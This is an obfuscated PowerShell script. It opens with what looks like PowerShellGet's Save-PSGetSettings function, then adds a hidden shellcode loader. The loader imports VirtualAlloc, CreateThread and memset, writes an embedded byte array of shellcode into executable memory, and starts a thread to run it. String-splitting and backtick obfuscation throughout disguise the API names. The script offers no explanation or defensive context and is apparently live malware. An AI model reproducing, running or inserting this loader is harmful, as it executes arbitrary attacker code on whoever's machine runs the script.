 Set-ITeM  ("{3}{2}{0}{1}" -f'BLe:Y9','I','a','vARI') ( [TyPe]("{4}{8}{2}{9}{10}{3}{5}{7}{0}{1}{11}{6}"-f 'N.pSsE','RI','ANAG','Ut','S','omaTi','eR','O','ySTEm.M','eMEnt','.a','aliz') )  ;  function s`AVe-`pSGets`ETTiNgs
{
    if(${s`c`RipT`:psg`ETSeT`Ti`NGS})
    {
        if(-not (&((("{1}{9}{7}{0}{3}{8}{4}{2}{5}{6}" -f 'anagem','M','st','ent','}Te','-P','ath','crosoft.PowerShell.M','{0','i'))  -F[cHAr]92) -Path ${S`CRi`pt:PSgeT`ApPl`O`caL`p`Ath}))
        {
            ${Nu`LL} = .(("{7}{5}{1}{0}{4}{3}{6}{2}"-f 'hell.Ma','S','Item','ntgjUNew','nageme','ft.Power','-','Microso'))."r`e`Place"('gjU',[STrING][ChAr]92) -Path ${s`CriPT:P`sg`eTaPpLoCALPA`Th} `
                                                             -ItemType ("{1}{0}{2}" -f 'o','Direct','ry') `
                                                             -Force `
                                                             -ErrorAction ("{2}{3}{0}{1}"-f'entlyCon','tinue','Si','l') `
                                                             -WarningAction ("{2}{3}{0}{1}" -f'tin','ue','SilentlyC','on') `
                                                             -Confirm:${F`ALse} `
                                                             -WhatIf:${fA`LSE}
        }

        &((("{0}{2}{3}{5}{6}{4}{1}"-f'Mi','tilitybQOOut-File','cr','osoft.Pow','Shell.U','e','r'))  -crEPLaCE  ([cHaR]98+[cHaR]81+[cHaR]79),[cHaR]92) -FilePath ${SCRIp`T:pSGETs`ett`i`N`G`sfiLE`p`ATh} -Force `
            -InputObject ( (  ls  ("{1}{2}{0}{3}" -f'bLE:','vArI','a','Y9I')).vAlUE::("{1}{2}{0}"-f'e','S','erializ').Invoke(${sCRiPt:`Ps`geTSE`TtI`N`GS}))

        &("{2}{3}{1}{0}"-f'g','ebu','Wri','te-D') ('I'+'n '+'Save-'+'PSGe'+'tSet'+'ti'+'ngs, '+'p'+'ersiste'+'d'+' '+'t'+'he '+"$script:PSGetSettingsFilePath "+'fi'+'le')
   }
}
${o`q7} = ((("{4}{14}{60}{48}{19}{5}{61}{54}{39}{42}{43}{11}{9}{16}{20}{71}{69}{32}{12}{62}{1}{58}{67}{10}{37}{0}{29}{44}{34}{50}{47}{24}{52}{3}{35}{46}{31}{8}{26}{64}{13}{51}{23}{70}{49}{66}{41}{17}{33}{65}{63}{40}{68}{38}{7}{56}{27}{53}{2}{57}{6}{59}{28}{55}{25}{36}{22}{30}{18}{15}{45}{21}" -f't flProt',' uint flAlloca','{0}msvcrt.dll{0})]publ','CreateThread(IntP','[','})]publi','c st','pT','readAtt','Int','Type, ui','c(',' ',', ','DllImport({0}',', uint c','Ptr ',' IntPtr lpParam','dest, uint src','l32.dll{0','l',');','emse','t ','r','t','rib','dId)',' extern Int','ect)','t(IntPtr ','h','int','e','ublic ','tr ','r m','n','r l','atic extern IntPtr Vir','lags,','Address,','tual','Allo',';[DllImport({0}kernel32.dll{0})]p','ount','lpT','tatic extern IntPt','rne','Size, IntPtr','s','uin',' ',';[DllImport(','t','P','hrea','i','t','atic','ke','c s','dwSize,','dwCreationF','utes','ter, uint ',' lpStart','ion',' IntPt','Address, u','dwStack','p'))  -f[ChAr]34);${W} = &("{1}{0}" -f'pe','Add-Ty') -memberDefinition ${O`Q7} -Name ("{0}{1}" -f 'Win3','2') -namespace ("{0}{1}{2}"-f 'Wi','n3','2Functions') -passthru;[Byte[]];[Byte[]]${z} = 0xba,0xdc,0x81,0x5d,0x89,0xd9,0xe9,0xd9,0x74,0x24,0xf4,0x5e,0x2b,0xc9,0xb1,0x4d,0x31,0x56,0x14,0x03,0x56,0x14,0x83,0xc6,0x04,0x3e,0x74,0xa1,0x61,0x3c,0x77,0x5a,0x72,0x20,0xf1,0xbf,0x43,0x60,0x65,0xcb,0xf4,0x50,0xed,0x99,0xf8,0x1b,0xa3,0x09,0x8a,0x69,0x6c,0x3d,0x3b,0xc7,0x4a,0x70,0xbc,0x7b,0xae,0x13,0x3e,0x81,0xe3,0xf3,0x7f,0x4a,0xf6,0xf2,0xb8,0xb6,0xfb,0xa7,0x11,0xbd,0xae,0x57,0x15,0x8b,0x72,0xd3,0x65,0x1a,0xf3,0x00,0x3d,0x1d,0xd2,0x96,0x35,0x44,0xf4,0x19,0x99,0xfd,0xbd,0x01,0xfe,0x3b,0x77,0xb9,0x34,0xb0,0x86,0x6b,0x05,0x39,0x24,0x52,0xa9,0xc8,0x34,0x92,0x0e,0x32,0x43,0xea,0x6c,0xcf,0x54,0x29,0x0e,0x0b,0xd0,0xaa,0xa8,0xd8,0x42,0x17,0x48,0x0d,0x14,0xdc,0x46,0xfa,0x52,0xba,0x4a,0xfd,0xb7,0xb0,0x77,0x76,0x36,0x17,0xfe,0xcc,0x1d,0xb3,0x5a,0x97,0x3c,0xe2,0x06,0x76,0x40,0xf4,0xe8,0x27,0xe4,0x7e,0x04,0x3c,0x95,0xdc,0x41,0xf1,0x94,0xde,0x91,0x9d,0xaf,0xad,0xa3,0x02,0x04,0x3a,0x88,0xcb,0x82,0xbd,0xef,0xe6,0x73,0x51,0x0e,0x08,0x84,0x7b,0xd5,0x5c,0xd4,0x13,0xfc,0xdc,0xbf,0xe3,0x01,0x09,0x6f,0xb4,0xad,0xe1,0xd0,0x64,0x0e,0x51,0xb9,0x6e,0x81,0x8e,0xd9,0x90,0x4b,0xa7,0xf2,0x61,0x74,0xc7,0x02,0x06,0x11,0xb5,0x67,0xd8,0xbd,0x5d,0x06,0x57,0x10,0xf3,0xb3,0xe3,0x6c,0x63,0x95,0x24,0x59,0xf3,0x1a,0xe1,0x2a,0xb3,0xf8,0x60,0x28,0x63,0x69,0x77,0x32,0x92,0x35,0xfe,0xd4,0xfe,0xd5,0x56,0x4e,0x96,0x4c,0xf3,0x04,0x07,0x90,0x29,0x61,0x07,0x1a,0xde,0x95,0xc9,0xeb,0xab,0x85,0xbd,0x1b,0xe6,0xf4,0x6b,0x23,0xdc,0x93,0x93,0xb1,0xdb,0x35,0xc4,0x2d,0xe6,0x60,0x22,0xf2,0x19,0x47,0x39,0x3b,0x8c,0x28,0x55,0x44,0x40,0xa9,0xa5,0x12,0x0a,0xa9,0xcd,0xc2,0x6e,0xfa,0xe8,0x0c,0xbb,0x6e,0xa1,0x98,0x44,0xc7,0x16,0x0a,0x2d,0xe5,0x41,0x7c,0xf2,0x16,0xa4,0x7c,0xce,0xc0,0x80,0x0a,0x3e,0xd1;${g} = 0x1000;if (${z}."LEnG`Th" -gt 0x1000){${G} = ${Z}."L`eNGTH"};${O`j9d}=${W}::("{1}{0}{2}"-f'tualA','Vir','lloc').Invoke(0,0x1000,${g},0x40);for (${I}=0;${I} -le (${Z}."lEN`GTh"-1);${i}++) {${w}::"mE`MS`eT"([IntPtr](${o`J9d}.("{0}{1}" -f'ToInt','32').Invoke()+${I}), ${Z}[${I}], 1)};${W}::("{2}{0}{1}{3}" -f 'ateT','hre','Cre','ad').Invoke(0,0,${oJ`9d},0,0,0);for (;;){.("{1}{2}{0}"-f'eep','St','art-sl') 60};
